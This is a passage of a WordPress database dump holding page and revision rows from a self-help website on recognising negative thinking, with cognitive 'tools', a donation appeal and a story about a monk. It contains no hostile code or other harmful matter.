to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s negative thought fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-06-06 19:11:25', '2023-06-06 19:11:25', '', 1658, 'https://www.happythinking.com/?p=1759', 0, 'revision', '', 0),
(1760, 1, '2023-06-06 19:12:37', '2023-06-06 19:12:37', '<!-- wp:paragraph -->\n<p>As you know, negative thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up negative thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the negative thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original negative thought. As Sally decides to ignore the negative thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-06-06 19:12:37', '2023-06-06 19:12:37', '', 1661, 'https://www.happythinking.com/?p=1760', 0, 'revision', '', 0),
(1762, 1, '2023-06-06 19:16:25', '2023-06-06 19:16:25', '<!-- wp:paragraph -->\n<p>So, my friends, you have come to the end of this website and I hope you found it interesting and useful. However, in reality, this is not truly the end! Let me explain.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For many years, I planned to make this website about happy thinking. It had been a dream of mine for a long while. Unfortunately, all these years, the website only existed in my head. The reason for this is actually that I suffered from the negative thinking pattern of trying to be a perfectionist. Perfectionism made me fear failure, making me not even start this website. Then one day it dawned on me that actually if I did not overcome the negative thinking pattern of trying to be perfect, this website would never ever materialise. I, therefore, forced myself to get in front of my keyboard and started writing, without worrying about the outcome. Luckily things started flowing, and what you read is the version so far. I hope you liked it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, I am determined to further work on this website in the coming months. I plan to add more negative thinking patterns and also more tools. I also plan to improve the material already present. To make the content easier and fun to read, I will be adding plenty of diagrams as well. Eventually, I will add a dedicated section containing loads of short examples demonstrating the various tools. I believe examples will go a long way in making things clearer. Finally, I also plan to add bits of wisdom from various sources, to help you along your journey to happiness. In essence, there will be lots more material&nbsp; and what I am saying is, â€œPlease visit this website again!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I do this website completely on my own using my own funds. If you are able to, I would be very grateful if you would consider donating the equivalent of one dollar to help with the running costs. To do so, you can go to the donate page by clicking the â€œdonateâ€ tab at the top.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I wish you bye for now.&nbsp; I sincerely hope to see you again soon. Happy Thinking!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Conclusion', '', 'inherit', 'closed', 'closed', '', '1667-revision-v1', '', '', '2023-06-06 19:16:25', '2023-06-06 19:16:25', '', 1667, 'https://www.happythinking.com/?p=1762', 0, 'revision', '', 0),
(1766, 1, '2023-06-07 16:11:15', '2023-06-07 16:11:15', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain negative ways of thinking that can negatively affect oneâ€™s mental well-being. On this website, I will describe to you, in an easy-to-understand way, various types of negative thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to change such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-07 16:11:15', '2023-06-07 16:11:15', '', 88, 'https://www.happythinking.com/?p=1766', 0, 'revision', '', 0),
(1765, 1, '2023-06-07 16:08:00', '2023-06-07 16:08:00', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain negative ways of thinking that can negatively affect oneâ€™s mental well-being. On this website, I will describe to you, in an easy-to-understand way, various types of negative thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to change such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-07 16:08:00', '2023-06-07 16:08:00', '', 88, 'https://www.happythinking.com/?p=1765', 0, 'revision', '', 0),
(1767, 1, '2023-06-07 16:12:41', '2023-06-07 16:12:41', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-07 16:12:41', '2023-06-07 16:12:41', '', 88, 'https://www.happythinking.com/?p=1767', 0, 'revision', '', 0),
(1994, 1, '2023-07-02 09:21:20', '2023-07-02 09:21:20', '<!-- wp:paragraph -->\n<p>As a monk, Tila had travelled far and wide, staying in many spiritual places, in search of bits of wisdom about how to be happy. He came to reside in my neighbourhood and I jumped at the chance to learn from his experiences. I made an appointment to meet him in his small room at the meditation centre where he was staying.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When I arrived at the meditation centre, I found Tila standing near the doorway to his room. He greeted me with a broad smile and asked me, â€œI forgot to ask you, what is your name?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œPrasanna, but I am happy for people to call me Pras.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œHow very interesting! Your name, in the ancient language of Sanskrit, actually means to be happy, and here you are visiting me to learn how to be happyâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œI hope you will be able to make my name come true!â€, I genuinely said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila motioned me to enter his room, and as we entered, he asked, â€œSo you really want me to teach you how to be happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Somewhat startled by this direct question, all I could manage to say was, â€œYes!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After guiding me to sit on a small sofa next to his bed, he spoke, â€œWell Pras, let us start at the beginning! What do you think is the meaning of happiness? What does it mean,â€˜to be happyâ€™ ?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite desiring to be happy for so long, I suddenly realised that I never really had thought about what being happy actually meant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila, probably realising that my answer was not going to come in a hurry, said, â€œDonâ€™t worry, I too struggled to come up with an answer when I was asked the same question many years ago. Even now, I have to ponder about it. In my current thinking, to be happy means different things to different people. To me, to be happy means to have a mind that is at peace despite all the stresses the world throws at it. Even with lots of challenges and difficult circumstances, if oneâ€™s mind can remain stress-free, in a good mood, and without worry and fear, then I think we can describe that person as being â€œhappyâ€. What do you think?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thankful that Tila had answered most of it, I just added my bit, â€œYes, I think I agree with how you describe what it is to be happy. I suffer, in various combinations, anxiety, depression and stress. I suppose not having these would make me a happy person.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila smiled, â€œYes, that makes sense. I am sure as we go along, we will both discover more and more about what it is to be happy. I am pleased to accompany you on this journey.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button /--></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'What is happiness?', '', 'publish', 'closed', 'closed', '', 'what-is-happiness', '', '', '2023-07-02 09:24:52', '2023-07-02 09:24:52', '', 0, 'https://www.happythinking.com/?page_id=1994', 0, 'page', '', 0),
(1829, 1, '2023-06-15 06:43:58', '2023-06-15 06:43:58', '', 'twospheres_160623', '', 'inherit', '', 'closed', '', 'twospheres_160623', '', '', '2023-06-15 06:43:58', '2023-06-15 06:43:58', '', 1616, 'https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1825, 1, '2023-06-15 06:30:52', '2023-06-15 06:30:52', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1803,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/am_i_happy_100623.jpg" alt="" class="wp-image-1803"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1824,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron160623.jpg" alt="" class="wp-image-1824"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-15 06:30:52', '2023-06-15 06:30:52', '', 1034, 'https://www.happythinking.com/?p=1825', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1780, 1, '2023-06-10 08:47:40', '2023-06-10 08:47:40', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} 